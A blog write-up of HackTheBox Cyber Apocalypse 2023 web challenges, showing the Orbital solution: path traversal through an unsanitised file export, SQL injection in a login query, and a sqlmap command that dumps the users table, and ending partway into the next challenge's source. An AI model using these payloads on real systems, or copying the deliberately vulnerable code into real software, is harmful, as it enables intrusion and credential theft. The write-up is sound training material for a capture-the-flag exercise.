<!doctype html><html lang=en-us><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><meta http-equiv=x-ua-compatible content="IE=edge"><meta name=generator content="Wowchemy 5.6.0 for Hugo"><link rel=preconnect href=https://fonts.gstatic.com crossorigin><link rel=preload as=style href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;700&family=Roboto+Mono&family=Roboto:wght@400;700&display=swap"><link rel=stylesheet href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;700&family=Roboto+Mono&family=Roboto:wght@400;700&display=swap" media=print onload='this.media="all"'><meta name=author content="BKISC"><meta name=description content="HTB CyberApocalypse 2023 - Web writeups."><link rel=alternate hreflang=en-us href=https://blog.bkisc.com/blog/hoangdayne/htb_cyberapocalypse2023_web/><meta name=theme-color content="#1565c0"><link rel=stylesheet href=/css/vendor-bundle.min.c7b8d9abd591ba2253ea42747e3ac3f5.css media=print onload='this.media="all"'><link rel=stylesheet href=https://cdn.jsdelivr.net/npm/academicons@1.9.1/css/academicons.min.css integrity="sha512-W0xM4mr6dEP9nREo7Z9z+9X70wytKvMGeDsj7ps2+xg5QPrEBXC8tAW1IFnzjR6eoJ90JmCnFzerQJTLzIEHjA==" crossorigin=anonymous media=print onload='this.media="all"'><link rel=stylesheet href=https://cdn.jsdelivr.net/npm/leaflet@1.7.1/dist/leaflet.min.css integrity crossorigin=anonymous media=print onload='this.media="all"'><link rel=stylesheet href=/css/wowchemy.e22d86ed144f359fa8422c2199d93ab4.css><link rel=stylesheet href=/css/libs/chroma/igor.min.css title=hl-light media=print onload='this.media="all"'><link rel=stylesheet href=/css/libs/chroma/dracula.min.css title=hl-dark media=print onload='this.media="all"' disabled><link rel=manifest href=/manifest.webmanifest><link rel=icon type=image/png href=/media/icon_hu606891fec664e3336fdbe668a4668404_488824_32x32_fill_lanczos_center_3.png><link rel=apple-touch-icon type=image/png href=/media/icon_hu606891fec664e3336fdbe668a4668404_488824_180x180_fill_lanczos_center_3.png><link rel=canonical href=https://blog.bkisc.com/blog/hoangdayne/htb_cyberapocalypse2023_web/><meta property="twitter:card" content="summary_large_image"><meta property="twitter:site" content="@wowchemy"><meta property="twitter:creator" content="@wowchemy"><meta property="og:site_name" content="BKISC Blogs"><meta property="og:url" content="https://blog.bkisc.com/blog/hoangdayne/htb_cyberapocalypse2023_web/"><meta property="og:title" content="HackTheBox CyberApocalypse 2023 - Web | BKISC Blogs"><meta property="og:description" content="HTB CyberApocalypse 2023 - Web writeups."><meta property="og:image" content="https://blog.bkisc.com/blog/hoangdayne/htb_cyberapocalypse2023_web/featured.jpg"><meta property="twitter:image" content="https://blog.bkisc.com/blog/hoangdayne/htb_cyberapocalypse2023_web/featured.jpg"><meta property="og:locale" content="en-us"><meta property="article:published_time" content="2023-03-23T00:00:00+00:00"><meta property="article:modified_time" content="2023-03-23T00:00:00+00:00"><title>HackTheBox CyberApocalypse 2023 - Web | BKISC Blogs</title></head><body id=top data-spy=scroll data-offset=70 data-target=#TableOfContents class=page-wrapper data-wc-page-id=440cf9c3122f6df94d9d0a5f548b0a35><script src=/js/wowchemy-init.min.613040fe4f2c0f007b4dcb64404201cb.js></script><aside class=search-modal id=search><div class=container><section class=search-header><div class="row no-gutters justify-content-between mb-3"><div class=col-6><h1>Search</h1></div><div class="col-6 col-search-close"><a class=js-search href=# aria-label=Close><i class="fas fa-times-circle text-muted" aria-hidden=true></i></a></div></div><div id=search-box><input name=q id=search-query placeholder=Search... autocapitalize=off autocomplete=off autocorrect=off spellcheck=false type=search class=form-control aria-label=Search...></div></section><section class=section-search-results><div id=search-hits></div></section></div></aside><div class=page-header><header class=header--fixed><nav class="navbar navbar-expand-lg navbar-light compensate-for-scrollbar" id=navbar-main><div class=container-xl><div class="d-none d-lg-inline-flex"><a class=navbar-brand href=/><img src=/media/logo_huc55a0313517dd04bda48a4ace4db28bc_511389_0x70_resize_lanczos_3.png alt="BKISC Blogs"></a></div><button type=button class=navbar-toggler data-toggle=collapse data-target=#navbar-content aria-controls=navbar-content aria-expanded=false aria-label="Toggle navigation">
<span><i class="fas fa-bars"></i></span></button><div class="navbar-brand-mobile-wrapper d-inline-flex d-lg-none"><a class=navbar-brand href=/><img src=/media/logo_huc55a0313517dd04bda48a4ace4db28bc_511389_0x70_resize_lanczos_3.png alt="BKISC Blogs"></a></div><div class="navbar-collapse main-menu-item collapse justify-content-center" id=navbar-content><ul class="navbar-nav d-md-inline-flex"><li class=nav-item><a class=nav-link href=/><span>Home</span></a></li><li class=nav-item><a class=nav-link href=/introduction><span>Introduction</span></a></li><li class=nav-item><a class=nav-link href=/post><span>News</span></a></li><li class=nav-item><a class=nav-link href=/event><span>Events</span></a></li><li class=nav-item><a class="nav-link active" href=/blog><span>Blogs</span></a></li><li class=nav-item><a class=nav-link href=/members><span>Members</span></a></li><li class=nav-item><a class=nav-link href=/contact><span>Contact</span></a></li></ul></div><ul class="nav-icons navbar-nav flex-row ml-auto d-flex pl-md-2"><li class=nav-item><a class="nav-link js-search" href=# aria-label=Search><i class="fas fa-search" aria-hidden=true></i></a></li><li class="nav-item dropdown theme-dropdown"><a href=# class=nav-link data-toggle=dropdown aria-haspopup=true aria-label="Display preferences"><i class="fas fa-moon" aria-hidden=true></i></a><div class=dropdown-menu><a href=# class="dropdown-item js-set-theme-light"><span>Light</span></a>
<a href=# class="dropdown-item js-set-theme-dark"><span>Dark</span></a>
<a href=# class="dropdown-item js-set-theme-auto"><span>Automatic</span></a></div></li></ul></div></nav></header></div><div class=page-body><article class=article><div class="article-container pt-3"><h1>HackTheBox CyberApocalypse 2023 - Web</h1><div class=article-metadata><div><span><a href=/author/le-hoang/>Lê Hoàng</a></span></div><span class=article-date>Mar 23, 2023</span></div></div><div class="article-header article-container featured-image-wrapper mt-4 mb-4" style=max-width:720px;max-height:406px><div style=position:relative><img src=/blog/hoangdayne/htb_cyberapocalypse2023_web/featured_hu5438825b9b6d1014226d20d231e650c2_377193_720x2500_fit_q75_h2_lanczos.webp width=720 height=406 alt class=featured-image>
<span class=article-header-caption>Image credit: <a href=https://ctftime.org/event/1889 target=_blank rel=noopener><strong>CyberApocalypse 2023</strong></a></span></div></div><div class=article-container><div class=article-style><details class="toc-inpage d-print-none" open><summary class=font-weight-bold>Table of Contents</summary><nav id=TableOfContents><ul><li><a href=#introduction>Introduction</a></li><li><a href=#orbital-easy>Orbital (easy)</a><ul><li><a href=#challenge>Challenge</a></li><li><a href=#solution>Solution</a></li></ul></li><li><a href=#didactic-octo-paddles-medium>Didactic Octo Paddles (medium)</a><ul><li><a href=#challenge-1>Challenge</a></li><li><a href=#solution-1>Solution</a></li></ul></li><li><a href=#spybug-medium-coming-soon>SpyBug (medium) (coming soon)</a></li><li><a href=#traptrack-hard-coming-soon>TrapTrack (hard) (coming soon)</a></li></ul></nav></details><h2 id=introduction>Introduction</h2><p>Welcome to my blog post about the web challenges in the HTB Cyber Apocalypse 2023 competition! For those who may not be familiar, HTB (Hack The Box) is a platform that provides a range of cybersecurity challenges for users to test and improve their skills. Cyber Apocalypse 2023 was a massive virtual event that took place in February 2023, where thousands of participants from all over the world competed in a range of challenges, including web, crypto, reverse engineering, and more.</p><p>We were able to reach 29th place and solve 60/74 challenges. Particularly for web challenges, we got 8/9 (the one we didn&rsquo;t solve was Unearthly Shop).</p><img src=flexing.png alt><p>In this blog post, I will focus specifically on the web challenges in the Cyber Apocalypse 2023 competition. I will provide a detailed analysis of each challenge, along with my thought process and the techniques I used to solve them. Whether you&rsquo;re an aspiring cybersecurity professional or a seasoned veteran, I hope you find my write-ups informative and helpful!</p><h2 id=orbital-easy>Orbital (easy)</h2><h3 id=challenge>Challenge</h3><p><strong>Given file:</strong>: <a href=https://github.com/HoangREALER/cyberApocalypse2023/blob/main/web_orbital.zip target=_blank rel=noopener>Get it here</a></p><p><strong>Description</strong>: In order to decipher the alien communication that held the key to their location, she needed access to a decoder with advanced capabilities - a decoder that only The Orbital firm possessed. Can you get your hands on the decoder?</p><h3 id=solution>Solution</h3><p>At first, we were given the login page which requires credentials. There&rsquo;s nothing else you can do at this point than reading given code.</p><img src=orbital1.png alt="Login page"><p>Upon given the code, you can find out that there is 1 user &ldquo;admin&rdquo; which is initiated at the time the docker is created. We can also see that, the application only has SELECT privilege on table <code>orbital.users</code> and <code>orbital.communications</code>.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>mysql -u root <span class=s>&lt;&lt; EOF
</span></span></span><span class=line><span class=cl><span class=s>CREATE DATABASE orbital;
</span></span></span><span class=line><span class=cl><span class=s>CREATE TABLE orbital.users (
</span></span></span><span class=line><span class=cl><span class=s>    id INTEGER PRIMARY KEY AUTO_INCREMENT,
</span></span></span><span class=line><span class=cl><span class=s>    username varchar(255) NOT NULL UNIQUE,
</span></span></span><span class=line><span class=cl><span class=s>    password varchar(255) NOT NULL
</span></span></span><span class=line><span class=cl><span class=s>);
</span></span></span><span class=line><span class=cl><span class=s>CREATE TABLE orbital.communication (
</span></span></span><span class=line><span class=cl><span class=s>    id INTEGER PRIMARY KEY AUTO_INCREMENT,
</span></span></span><span class=line><span class=cl><span class=s>    source varchar(255) NOT NULL,
</span></span></span><span class=line><span class=cl><span class=s>    destination varchar(255) NOT NULL,
</span></span></span><span class=line><span class=cl><span class=s>    name varchar(255) NOT NULL,
</span></span></span><span class=line><span class=cl><span class=s>    downloadable varchar(255) NOT NULL
</span></span></span><span class=line><span class=cl><span class=s>);
</span></span></span><span class=line><span class=cl><span class=s>INSERT INTO orbital.users (username, password) VALUES (&#39;admin&#39;, &#39;$(genPass)&#39;);
</span></span></span><span class=line><span class=cl><span class=s>INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES (&#39;Titan&#39;, &#39;Arcturus&#39;, &#39;Ice World Calling Red Giant&#39;, &#39;communication.mp3&#39;);
</span></span></span><span class=line><span class=cl><span class=s>INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES (&#39;Andromeda&#39;, &#39;Vega&#39;, &#39;Spiral Arm Salutations&#39;, &#39;communication.mp3&#39;);
</span></span></span><span class=line><span class=cl><span class=s>INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES (&#39;Proxima Centauri&#39;, &#39;Trappist-1&#39;, &#39;Lone Star Linkup&#39;, &#39;communication.mp3&#39;);
</span></span></span><span class=line><span class=cl><span class=s>INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES (&#39;TRAPPIST-1h&#39;, &#39;Kepler-438b&#39;, &#39;Small World Symposium&#39;, &#39;communication.mp3&#39;);
</span></span></span><span class=line><span class=cl><span class=s>INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES (&#39;Winky&#39;, &#39;Boop&#39;, &#39;Jelly World Japes&#39;, &#39;communication.mp3&#39;);
</span></span></span><span class=line><span class=cl><span class=s>CREATE USER &#39;user&#39;@&#39;localhost&#39; IDENTIFIED BY &#39;M@k3l@R!d3s$&#39;;
</span></span></span><span class=line><span class=cl><span class=s>GRANT SELECT ON orbital.users TO &#39;user&#39;@&#39;localhost&#39;;
</span></span></span><span class=line><span class=cl><span class=s>GRANT SELECT ON orbital.communication TO &#39;user&#39;@&#39;localhost&#39;;
</span></span></span><span class=line><span class=cl><span class=s>FLUSH PRIVILEGES;
</span></span></span><span class=line><span class=cl><span class=s>EOF</span>
</span></span></code></pre></div><p>Now let&rsquo;s move on with the application. At first glance at source code, we can see it is vulnerable to Local File Inclusion attack at this endpoint <code>blueprints/routes.py</code>.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>from</span> <span class=nn>flask</span> <span class=kn>import</span> <span class=n>Blueprint</span><span class=p>,</span> <span class=n>render_template</span><span class=p>,</span> <span class=n>request</span><span class=p>,</span> <span class=n>session</span><span class=p>,</span> <span class=n>redirect</span><span class=p>,</span> <span class=n>send_file</span>
</span></span><span class=line><span class=cl><span class=kn>from</span> <span class=nn>application.database</span> <span class=kn>import</span> <span class=n>login</span><span class=p>,</span> <span class=n>getCommunication</span>
</span></span><span class=line><span class=cl><span class=kn>from</span> <span class=nn>application.util</span> <span class=kn>import</span> <span class=n>response</span><span class=p>,</span> <span class=n>isAuthenticated</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>web</span> <span class=o>=</span> <span class=n>Blueprint</span><span class=p>(</span><span class=s1>&#39;web&#39;</span><span class=p>,</span> <span class=vm>__name__</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>api</span> <span class=o>=</span> <span class=n>Blueprint</span><span class=p>(</span><span class=s1>&#39;api&#39;</span><span class=p>,</span> <span class=vm>__name__</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=nd>@web.route</span><span class=p>(</span><span class=s1>&#39;/&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>signIn</span><span class=p>():</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=n>render_template</span><span class=p>(</span><span class=s1>&#39;login.html&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=nd>@web.route</span><span class=p>(</span><span class=s1>&#39;/logout&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>logout</span><span class=p>():</span>
</span></span><span class=line><span class=cl>    <span class=n>session</span><span class=p>[</span><span class=s1>&#39;auth&#39;</span><span class=p>]</span> <span class=o>=</span> <span class=kc>None</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=n>redirect</span><span class=p>(</span><span class=s1>&#39;/&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=nd>@web.route</span><span class=p>(</span><span class=s1>&#39;/home&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=nd>@isAuthenticated</span>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>home</span><span class=p>():</span>
</span></span><span class=line><span class=cl>    <span class=n>allCommunication</span> <span class=o>=</span> <span class=n>getCommunication</span><span class=p>()</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=n>render_template</span><span class=p>(</span><span class=s1>&#39;home.html&#39;</span><span class=p>,</span> <span class=n>allCommunication</span><span class=o>=</span><span class=n>allCommunication</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=nd>@api.route</span><span class=p>(</span><span class=s1>&#39;/login&#39;</span><span class=p>,</span> <span class=n>methods</span><span class=o>=</span><span class=p>[</span><span class=s1>&#39;POST&#39;</span><span class=p>])</span>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>apiLogin</span><span class=p>():</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=ow>not</span> <span class=n>request</span><span class=o>.</span><span class=n>is_json</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=n>response</span><span class=p>(</span><span class=s1>&#39;Invalid JSON!&#39;</span><span class=p>),</span> <span class=mi>400</span>
</span></span><span class=line><span class=cl>    
</span></span><span class=line><span class=cl>    <span class=n>data</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=n>get_json</span><span class=p>()</span>
</span></span><span class=line><span class=cl>    <span class=n>username</span> <span class=o>=</span> <span class=n>data</span><span class=o>.</span><span class=n>get</span><span class=p>(</span><span class=s1>&#39;username&#39;</span><span class=p>,</span> <span class=s1>&#39;&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>password</span> <span class=o>=</span> <span class=n>data</span><span class=o>.</span><span class=n>get</span><span class=p>(</span><span class=s1>&#39;password&#39;</span><span class=p>,</span> <span class=s1>&#39;&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=ow>not</span> <span class=n>username</span> <span class=ow>or</span> <span class=ow>not</span> <span class=n>password</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=n>response</span><span class=p>(</span><span class=s1>&#39;All fields are required!&#39;</span><span class=p>),</span> <span class=mi>401</span>
</span></span><span class=line><span class=cl>    
</span></span><span class=line><span class=cl>    <span class=n>user</span> <span class=o>=</span> <span class=n>login</span><span class=p>(</span><span class=n>username</span><span class=p>,</span> <span class=n>password</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=n>user</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>session</span><span class=p>[</span><span class=s1>&#39;auth&#39;</span><span class=p>]</span> <span class=o>=</span> <span class=n>user</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=n>response</span><span class=p>(</span><span class=s1>&#39;Success&#39;</span><span class=p>),</span> <span class=mi>200</span>
</span></span><span class=line><span class=cl>        
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=n>response</span><span class=p>(</span><span class=s1>&#39;Invalid credentials!&#39;</span><span class=p>),</span> <span class=mi>403</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=nd>@api.route</span><span class=p>(</span><span class=s1>&#39;/export&#39;</span><span class=p>,</span> <span class=n>methods</span><span class=o>=</span><span class=p>[</span><span class=s1>&#39;POST&#39;</span><span class=p>])</span>
</span></span><span class=line><span class=cl><span class=nd>@isAuthenticated</span>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>exportFile</span><span class=p>():</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=ow>not</span> <span class=n>request</span><span class=o>.</span><span class=n>is_json</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=n>response</span><span class=p>(</span><span class=s1>&#39;Invalid JSON!&#39;</span><span class=p>),</span> <span class=mi>400</span>
</span></span><span class=line><span class=cl>    
</span></span><span class=line><span class=cl>    <span class=n>data</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=n>get_json</span><span class=p>()</span>
</span></span><span class=line><span class=cl>    <span class=n>communicationName</span> <span class=o>=</span> <span class=n>data</span><span class=o>.</span><span class=n>get</span><span class=p>(</span><span class=s1>&#39;name&#39;</span><span class=p>,</span> <span class=s1>&#39;&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=k>try</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=c1># Everyone is saying I should escape specific characters in the filename. I don&#39;t know why.</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=n>send_file</span><span class=p>(</span><span class=sa>f</span><span class=s1>&#39;/communications/</span><span class=si>{</span><span class=n>communicationName</span><span class=si>}</span><span class=s1>&#39;</span><span class=p>,</span> <span class=n>as_attachment</span><span class=o>=</span><span class=kc>True</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=k>except</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=n>response</span><span class=p>(</span><span class=s1>&#39;Unable to retrieve the communication&#39;</span><span class=p>),</span> <span class=mi>400</span>
</span></span></code></pre></div><p>Here we can see when we call <code>/api/export</code> with POST method it will use body parameter <code>name</code> to get the files. We can exploit this to get the flag using something like <code>name=../../../../flag.txt</code>. But to use this endpoint, we must be authenticated, at the context of this challenge only &ldquo;admin&rdquo; user can be authenticated.</p><p>Looking at how authentication works, I found out a place that is vulnerable to SQL Injection. However keep in mind that we are only granted access to SELECT on table <code>users</code> and <code>communications</code>. I decided to use <code>sqlmap</code> to save the what&rsquo;re left of my brain cells.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=k>def</span> <span class=nf>login</span><span class=p>(</span><span class=n>username</span><span class=p>,</span> <span class=n>password</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=c1># I don&#39;t think it&#39;s not possible to bypass login because I&#39;m verifying the password later.</span>
</span></span><span class=line><span class=cl>    <span class=n>user</span> <span class=o>=</span> <span class=n>query</span><span class=p>(</span><span class=sa>f</span><span class=s1>&#39;SELECT username, password FROM users WHERE username = &#34;</span><span class=si>{</span><span class=n>username</span><span class=si>}</span><span class=s1>&#34;&#39;</span><span class=p>,</span> <span class=n>one</span><span class=o>=</span><span class=kc>True</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=n>user</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>passwordCheck</span> <span class=o>=</span> <span class=n>passwordVerify</span><span class=p>(</span><span class=n>user</span><span class=p>[</span><span class=s1>&#39;password&#39;</span><span class=p>],</span> <span class=n>password</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>        <span class=k>if</span> <span class=n>passwordCheck</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=n>token</span> <span class=o>=</span> <span class=n>createJWT</span><span class=p>(</span><span class=n>user</span><span class=p>[</span><span class=s1>&#39;username&#39;</span><span class=p>])</span>
</span></span><span class=line><span class=cl>            <span class=k>return</span> <span class=n>token</span>
</span></span><span class=line><span class=cl>    <span class=k>else</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=kc>False</span>
</span></span></code></pre></div><p>I decided to use <code>Burpsuite</code> to capture to login request, modified the field <code>username</code> with value <code>*</code> and saved it for the usage of <code>sqlmap</code>.</p><img src=orbital2.png alt="Burpsuite demo"><p>I saved it as <code>req.txt</code>. Since the database and the table was already known the command I used was:</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>sqlmap -r req.txt --level<span class=o>=</span><span class=m>5</span> --risk<span class=o>=</span><span class=m>3</span> --technique<span class=o>=</span>T -o --ignore-code <span class=m>401</span> -D orbital -T users --dump
</span></span></code></pre></div><img src=orbital3.png alt="SQLMap demo"><p>Nice but we only got the hash. Initially, we was trying to use <code>hashcat</code> but since this is HackTheBox, the challenge may use well-known hash so I throw it on the internet and Voila! The credential is <code>admin:ichliebedich</code>, login and use LFI attack the get flag.</p><img src=orbital4.png alt="SQLMap demo">
<img src=orbital5.png alt="SQLMap demo"><p>Flag: <code>HTB{T1m3_b4$3d_$ql1_4r3_fun!!!}</code></p><h2 id=didactic-octo-paddles-medium>Didactic Octo Paddles (medium)</h2><h3 id=challenge-1>Challenge</h3><p><strong>Given File</strong>: <a href=https://github.com/HoangREALER/cyberApocalypse2023/blob/main/web_didactic_octo_paddle.zip target=_blank rel=noopener>Get it here</a></p><p><strong>Description</strong>: You have been hired by the Intergalactic Ministry of Spies to retrieve a powerful relic that is believed to be hidden within the small paddle shop, by the river. You must hack into the paddle shop&rsquo;s system to obtain information on the relic&rsquo;s location. Your ultimate challenge is to shut down the parasitic alien vessels and save humanity from certain destruction by retrieving the relic hidden within the Didactic Octo Paddles shop.</p><h3 id=solution-1>Solution</h3><p>This time it gives us a login panel like the last time. Except this time it also has register function. Let&rsquo;s look at the main routes in the source code.</p><p><code>challenge/routes/index.js</code></p><div class=highlight><pre tabindex=0 class=chroma><code class=language-js data-lang=js><span class=line><span class=cl><span class=nx>module</span><span class=p>.</span><span class=nx>exports</span> <span class=o>=</span> <span class=p>(</span><span class=nx>db</span><span class=p>)</span> <span class=p>=&gt;</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=kr>const</span> <span class=nx>bcrypt</span> <span class=o>=</span> <span class=nx>require</span><span class=p>(</span><span class=s2>&#34;bcryptjs&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=kr>const</span> <span class=nx>router</span> <span class=o>=</span> <span class=nx>require</span><span class=p>(</span><span class=s2>&#34;express&#34;</span><span class=p>).</span><span class=nx>Router</span><span class=p>();</span>
</span></span><span class=line><span class=cl>    <span class=kr>const</span> <span class=nx>jwt</span> <span class=o>=</span> <span class=nx>require</span><span class=p>(</span><span class=s2>&#34;jsonwebtoken&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=kr>const</span> <span class=nx>jsrender</span> <span class=o>=</span> <span class=nx>require</span><span class=p>(</span><span class=s2>&#34;jsrender&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=kr>const</span> <span class=nx>AuthMiddleware</span> <span class=o>=</span> <span class=nx>require</span><span class=p>(</span><span class=s2>&#34;../middleware/AuthMiddleware&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=kr>const</span> <span class=nx>AdminMiddleware</span> <span class=o>=</span> <span class=nx>require</span><span class=p>(</span><span class=s2>&#34;../middleware/AdminMiddleware&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=kr>const</span> <span class=p>{</span> <span class=nx>tokenKey</span><span class=p>,</span> <span class=nx>getUserId</span> <span class=p>}</span> <span class=o>=</span> <span class=nx>require</span><span class=p>(</span><span class=s2>&#34;../utils/authorization&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=kr>const</span> <span class=nx>response</span> <span class=o>=</span> <span class=p>(</span><span class=nx>data</span><span class=p>)</span> <span class=p>=&gt;</span> <span class=p>({</span> <span class=nx>message</span><span class=o>:</span> <span class=nx>data</span> <span class=p>});</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=nx>router</span><span class=p>.</span><span class=nx>get</span><span class=p>(</span><span class=s2>&#34;/&#34;</span><span class=p>,</span> <span class=nx>AuthMiddleware</span><span class=p>,</span> <span class=kr>async</span> <span class=p>(</span><span class=nx>req</span><span class=p>,</span> <span class=nx>res</span><span class=p>)</span> <span class=p>=&gt;</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=k>try</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=kr>const</span> <span class=nx>products</span> <span class=o>=</span> <span class=kr>await</span> <span class=nx>db</span><span class=p>.</span><span class=nx>Products</span><span class=p>.</span><span class=nx>findAll</span><span class=p>();</span>
</span></span><span class=line><span class=cl>            <span class=nx>res</span><span class=p>.</span><span class=nx>render</span><span class=p>(</span><span class=s2>&#34;index&#34;</span><span class=p>,</span> <span class=p>{</span> <span class=nx>products</span><span class=o>:</span> <span class=nx>products</span> <span class=p>});</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span> <span class=k>catch</span> <span class=p>(</span><span class=nx>error</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=nx>console</span><span class=p>.</span><span class=nx>error</span><span class=p>(</span><span class=nx>error</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=nx>res</span><span class=p>.</span><span class=nx>status</span><span class=p>(</span><span class=mi>500</span><span class=p>).</span><span class=nx>send</span><span class=p>(</span><span class=s2>&#34;Something went wrong!&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=p>});</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=p>........</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=nx>router</span><span class=p>.</span><span class=nx>post</span><span class=p>(</span><span class=s2>&#34;/register&#34;</span><span class=p>,</span> <span class=kr>async</span> <span class=p>(</span><span class=nx>req</span><span class=p>,</span> <span class=nx>res</span><span class=p>)</span> <span class=p>=&gt;</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=k>try</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=kr>const</span> <span class=nx>username</span> <span class=o>=</span> <span class=nx>req</span><span class=p>.</span><span class=nx>body</span><span class=p>.</span><span class=nx>username</span><span class=p>;</span>
</span></span><span class=line><span class=cl>            <span class=kr>const</span> <span class=nx>password</span> <span class=o>=</span> <span class=nx>req</span><span class=p>.</span><span class=nx>body</span><span class=p>.</span><span class=nx>password</span><span class=p>;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=k>if</span> <span class=p>(</span><span class=o>!</span><span class=nx>username</span> <span class=o>||</span> <span class=o>!</span><span class=nx>password</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=k>return</span> <span class=nx>res</span>
</span></span><span class=line><span class=cl>                    <span class=p>.</span><span class=nx>status</span><span class=p>(</span><span class=mi>400</span><span class=p>)</span>
</span></span><span class=line><span class=cl>                    <span class=p>.</span><span class=nx>send</span><span class=p>(</span><span class=nx>response</span><span class=p>(</span><span class=s2>&#34;Username and password are required&#34;</span><span class=p>));</span>
</span></span><span class=line><span class=cl>            <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=kr>const</span> <span class=nx>existingUser</span> <span class=o>=</span> <span class=kr>await</span> <span class=nx>db</span><span class=p>.</span><span class=nx>Users</span><span class=p>.</span><span class=nx>findOne</span><span class=p>({</span>
</span></span><span class=line><span class=cl>                <span class=nx>where</span><span class=o>:</span> <span class=p>{</span> <span class=nx>username</span><span class=o>:</span> <span class=nx>username</span> <span class=p>},</span>
</span></span><span class=line><span class=cl>            <span class=p>});</span>
</span></span><span class=line><span class=cl>            <span class=k>if</span> <span class=p>(</span><span class=nx>existingUser</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=k>return</span> <span class=nx>res</span>
</span></span><span class=line><span class=cl>                    <span class=p>.</span><span class=nx>status</span><span class=p>(</span><span class=mi>400</span><span class=p>)</span>
</span></span><span class=line><span class=cl>                    <span class=p>.</span><span class=nx>send</span><span class=p>(</span><span class=nx>response</span><span class=p>(</span><span class=s2>&#34;Username already exists&#34;</span><span class=p>));</span>
